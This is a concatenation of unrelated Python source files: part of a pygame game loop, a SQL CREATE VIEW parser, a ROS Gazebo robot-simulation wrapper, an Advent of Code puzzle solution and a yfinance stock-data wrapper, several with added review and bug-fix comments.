                    mouse_position = pygame.mouse.get_pos()
                    res["current quadrant"] = mouse_in_quadrant(mouse_position,
                                                                res["quadrants"])
                    res["game state"] = update_state_machine()
                    res[res["game state"] + " logic"]()
                elif keys[pygame.K_r]:
                    res["keep playing"] = True
            if res["keep playing"]:
                break
            update_screen()
            res[res["game state"] + " display"]()
            advance_frame()
        #res["battle music"].stop()
        pygame.mixer.music.stop()
def play(screen = None, my_pk = None, opp_pk = None):
    """Public entry point: thin wrapper that forwards all arguments to main()."""
    main(screen, my_pk, opp_pk)
res = {} # Resources dict kept as a global variable for easy access
# res is defined after the functions above; that is fine because they only
# resolve the global at call time.
if __name__ == "__main__":
    main()
|
from ..parser.Parser import Parser, ParserUtils
from ..schema.PgView import PgView
class CreateViewParser(object):
    """Parser for CREATE [OR REPLACE] VIEW statements."""

    @staticmethod
    def parse(database, statement):
        """Parse *statement* and add the resulting PgView to *database*.

        :param database: schema container offering getSchema(name)
        :param statement: the full CREATE VIEW SQL text
        :raises Exception: when the view's schema is not found in *database*
        """
        parser = Parser(statement)
        parser.expect("CREATE")
        parser.expect_optional("OR", "REPLACE")
        parser.expect("VIEW")
        viewName = parser.parse_identifier()
        columnNames = list()
        # Optional explicit column list: CREATE VIEW name (col1, col2, ...) AS ...
        columnsExist = parser.expect_optional("(")
        if (columnsExist):
            while not parser.expect_optional(")"):
                columnNames.append(ParserUtils.get_object_name(parser.parse_identifier()))
                parser.expect_optional(",")
        parser.expect("AS")
        # Everything after AS is the view's defining query.
        query = parser.get_rest()
        view = PgView(ParserUtils.get_object_name(viewName))
        view.columnNames = columnNames
        view.query = query
        schemaName = ParserUtils.get_schema_name(viewName, database)
        schema = database.getSchema(schemaName)
        if schema is None:
            # BUG FIX: the original message was "CannotFindSchema" % (...),
            # a format string with no placeholders, which raises
            # "TypeError: not all arguments converted" instead of the
            # intended error.
            raise Exception(
                "Cannot find schema '%s' for statement '%s'"
                % (schemaName, statement))
        schema.addView(view)
|
#!/usr/bin/env python
import rospy
from std_srvs.srv import Empty
from gazebo_msgs.msg import ModelState
from gazebo_msgs.srv import SetModelState, GetModelState
from geometry_msgs.msg import Quaternion
from sensor_msgs.msg import LaserScan
from pyquaternion import Quaternion as qt
def create_model_state(x, y, z, angle):
    """Build a ModelState placing the 'jackal' model at (x, y, z), yawed by *angle* rad."""
    state = ModelState()
    state.model_name = 'jackal'
    state.pose.position.x = x
    state.pose.position.y = y
    state.pose.position.z = z
    # pyquaternion yields elements as (w, x, y, z); geometry_msgs Quaternion
    # takes (x, y, z, w), hence the reordering.
    w, qx, qy, qz = qt(axis=[0, 0, 1], angle=angle).elements
    state.pose.orientation = Quaternion(qx, qy, qz, w)
    state.reference_frame = "world"
    return state
class GazeboSimulation():
    """Wrapper around the Gazebo ROS services used to drive the 'jackal' model.

    init_position is a 3-item sequence [x, y, yaw]; z is always 0.
    """

    def __init__(self, init_position = None):
        # The default is resolved here rather than as `= [0, 0, 0]` to avoid
        # a shared mutable default argument; behaviour is unchanged.
        if init_position is None:
            init_position = [0, 0, 0]
        self._pause = rospy.ServiceProxy('/gazebo/pause_physics', Empty)
        self._unpause = rospy.ServiceProxy('/gazebo/unpause_physics', Empty)
        self._reset = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState)
        self._model_state_getter = rospy.ServiceProxy('/gazebo/get_model_state', GetModelState)
        self._init_model_state = create_model_state(init_position[0], init_position[1], 0, init_position[2])

    def pause(self):
        """Pause Gazebo physics; a failed call is printed, not raised."""
        rospy.wait_for_service('/gazebo/pause_physics')
        try:
            self._pause()
        except rospy.ServiceException:
            print ("/gazebo/pause_physics service call failed")

    def unpause(self):
        """Resume Gazebo physics; a failed call is printed, not raised."""
        rospy.wait_for_service('/gazebo/unpause_physics')
        try:
            self._unpause()
        except rospy.ServiceException:
            print ("/gazebo/unpause_physics service call failed")

    def reset(self):
        """Teleport the model back to its initial pose.

        /gazebo/reset_world or /gazebo/reset_simulation would
        destroy the world setting, so set_model_state is used
        to put the model back to the origin instead.
        """
        rospy.wait_for_service("/gazebo/set_model_state")
        try:
            self._reset(self._init_model_state)
        except rospy.ServiceException:
            print ("/gazebo/set_model_state service call failed")

    def get_laser_scan(self):
        """Block until a LaserScan arrives on 'front/scan', retrying on 5 s timeouts."""
        data = None
        while data is None:
            try:
                data = rospy.wait_for_message('front/scan', LaserScan, timeout=5)
            # BUG FIX: the original bare `except:` also swallowed
            # KeyboardInterrupt/SystemExit, making this retry loop
            # impossible to interrupt. wait_for_message signals a timeout
            # with rospy.ROSException.
            except rospy.ROSException:
                pass
        return data

    def get_model_state(self):
        """Return the current state of 'jackal' relative to the 'world' frame."""
        rospy.wait_for_service("/gazebo/get_model_state")
        try:
            return self._model_state_getter('jackal', 'world')
        except rospy.ServiceException:
            print ("/gazebo/get_model_state service call failed")

    def reset_init_model_state(self, init_position = None):
        """Replace the pose that reset() restores; init_position is [x, y, yaw]."""
        if init_position is None:
            init_position = [0, 0, 0]
        self._init_model_state = create_model_state(init_position[0], init_position[1], 0, init_position[2])
|
import os
# Part 1: Find 2 numbers that add to 2020 and multiply them
# NOTE(review): os.path.abspath('') resolves the *current working directory*,
# so the computed input path depends on where the script is launched from,
# not on this file's location — confirm that is intended.
dirname = os.path.dirname(os.path.abspath(''))
filename = os.path.join(dirname,'inputs','d01_input.txt')
with open(filename, "r") as f:
    # One puzzle entry (an integer) per line, newlines stripped.
    lines = f.read().splitlines()
from itertools import combinations  # pairs of *distinct* entries

# BUG FIX: the original nested loop paired each entry with every entry
# including itself (a lone 1010 would falsely match), and its `break` only
# exited the inner loop, so the answer was printed once per ordering.
for a, b in combinations(map(int, lines), 2):
    if a + b == 2020:
        answer = a * b
        print(f'Answer is {a}+{b}={answer}')
        break
# Part 2: Find 3 numbers that add to 2020 and multiply them
from itertools import combinations  # triples of *distinct* entries

# BUG FIX: the original triple loop could reuse the same entry and its
# `break` only exited the innermost loop, so every permutation of the
# matching triple was printed.
for n1, n2, n3 in combinations(map(int, lines), 3):
    if n1 + n2 + n3 == 2020:
        answer = n1 * n2 * n3
        print(f'Answer is {n1}+{n2}+{n3}={answer}')
        break
import yfinance as yf
class Asset:
    """Wrapper around a yfinance Ticker exposing price history and valuation ratios.

    Every get_hist_* method returns the "Close" column of the pandas
    DataFrame produced by yfinance for a fixed (period, interval) pair.
    """

    def __init__(self, tiker):
        """Create the yfinance Ticker and remember the raw symbol.

        :param tiker: ticker symbol of the requested quote (e.g. "TSLA")
        """
        self.tiker = yf.Ticker(tiker)
        self.tiker_name = tiker

    def _close_history(self, period, interval):
        """Shared helper: fetch history for *period*/*interval*, return "Close"."""
        return self.tiker.history(period=period, interval=interval)["Close"]

    def get_hist_last_1_day(self):
        """Close prices for the last day at a 2-minute interval."""
        return self._close_history("1d", "2m")

    def get_hist_last_5_days(self):
        """Close prices for the last 5 days at a 15-minute interval."""
        return self._close_history("5d", "15m")

    def get_hist_last_1_month(self):
        """Close prices for the last month at a 1-day interval."""
        return self._close_history("1mo", "1d")

    def get_hist_last_6_months(self):
        """Close prices for the last 6 months at a 1-day interval."""
        return self._close_history("6mo", "1d")

    def get_hist_last_1_year(self):
        """Close prices for the last year at a 5-day interval."""
        return self._close_history("1y", "5d")

    def get_hist_ytd(self):
        """Close prices since the start of the current year at a 5-day interval."""
        return self._close_history("ytd", "5d")

    def get_hist_last_5_years(self):
        """Close prices for the last 5 years at a 1-month interval."""
        return self._close_history("5y", "1mo")

    def get_hist_all_time(self):
        """Close prices for the full available history at a 1-month interval."""
        return self._close_history("max", "1mo")

    def get_trailingPE(self):
        """:return: the trailing P/E ratio."""
        return self.tiker.info['trailingPE']

    def get_enterpriseToEbitda(self):
        """:return: the EV/EBITDA ratio."""
        return self.tiker.info['enterpriseToEbitda']

    def get_priceToBook(self):
        """:return: the P/B ratio."""
        return self.tiker.info['priceToBook']

    def get_forwardEps(self):
        """:return: the forward EPS value."""
        return self.tiker.info['forwardEps']

    def get_priceToSalesTrailing12Months(self):
        """:return: the P/S ratio (trailing 12 months)."""
        return self.tiker.info['priceToSalesTrailing12Months']

    def __repr__(self):
        return f"Объект 'yfinance' с заданным тикером {self.tiker_name}"
if __name__ == "__main__":
    # Manual smoke test: every call below hits Yahoo Finance, so this
    # requires network access and a valid ticker.
    test = Asset("TSLA")
    # print(test.get_hist_last_1_day())
    print(test)
    print(type(test))
    print(test.get_trailingPE())
    print(test.get_enterpriseToEbitda())
    print(test.get_priceToBook())
    print(test.get_forwardEps())
    print(test.get_priceToSalesTrailing12Months())
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.